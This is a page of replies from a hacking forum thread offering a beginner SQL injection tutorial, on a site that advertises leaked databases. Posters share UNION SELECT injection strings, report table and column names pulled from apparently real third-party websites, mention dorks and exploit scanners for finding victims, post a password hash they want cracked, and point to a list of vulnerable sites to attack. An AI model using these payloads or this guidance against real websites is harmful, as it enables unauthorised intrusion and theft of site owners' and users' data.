Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 467 Vote(s) - 3.57 Average
  • 1
  • 2
  • 3
  • 4
  • 5
SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D

#11
ty man...im really new at this stuff..only know few thinks...more tuts like this! ! :smile:

edit:i tried a lot of this Dorks i even use Exploit Scaner and i can't find any vulnerable web site....pls help me
Reply

#12
Nice short Tut saves time ^_^.
Reply

#13
Quote:(07-03-2011, 12:20 AM)∑√ıŁ Wrote:

[To see links please register here]

Nice short Tut saves time ^_^.

Thanks! Glad you like it.
Reply

#14
Quote:(06-30-2011, 07:34 PM)xxl00pb4ckxx Wrote:

[To see links please register here]

Hey I'm getting the hang of it, but no luck yet...

When I get to replacing @@version with concat(database()) to pull the db name I get this error on every site:

Here's an example:

[To see links please register here]

--

works fine, outputs: 5.1.56

ok so I replace @@version and now the url looks like:

[To see links please register here]

union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--

the url look mangled in the input box:

[To see links please register here]

now

and I get this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database ,3,4,5,6,7,8,9,10,11,12- AND PostType = 2 LIMIT 13' at line 1

help? getting the same thing on like 5 vuln sites in a row :sad:

this is my style bro....

[To see links please register here]

union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--


[To see links please register here]

--

FOUnd:FORUM,FORUM_COMMENTS,OBITUARIES,POST

[To see links please register here]

--

Found:ID,Title,Date,Post,VISIBLE,ID,Forum_ID,Name,Email,Location,Comment,Date,Visible,ID,Title,obituary,Image,IsVisible,ID,Title,Tagline,Author,DatePosted,Post,Image,Caption,ImageAuthor,PostType,FrontPage,IsPublish

it can't find admin table... so i just want to show you example to find user+pass from admin table..
this:

[To see links please register here]

--

but it still not found another data ,because the table/column in database is none...

i'm so sorry before my english is sucks ...
^_^' :epic:

Reply

#15
man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol
Reply

#16
Quote:(08-02-2011, 11:27 PM)sec0verun Wrote:

[To see links please register here]

man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol

Hacking websites with mysql 4 or lower is hard as fuck and takes forever even with tools. I don't recommend doing it.

And if you're looking for fresh sites to practice on, look at my list of vulnerable sites. Just follow the tutorial, some sites might not work btw.
Reply

#17
I love hackng.But i dont have computer to do this
Reply

#18
Quote:(08-06-2011, 02:15 PM)HackThenNom Wrote:

[To see links please register here]

I must be a mega noob, you lsot me when we were adding stuff to the end of the URL. the site i want to hack is


[To see links please register here]


It isn't vulnerable to SQLi. You can't inject into it.
Reply

#19
well your tutorial was very good and i kinda got it full but then i came up with this hash i cant decyrpt it haviji failed it too


3ad123c36286fddbf0a080a26c556741,6
Reply

#20
nice tut bro. . . easy to understand too...
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through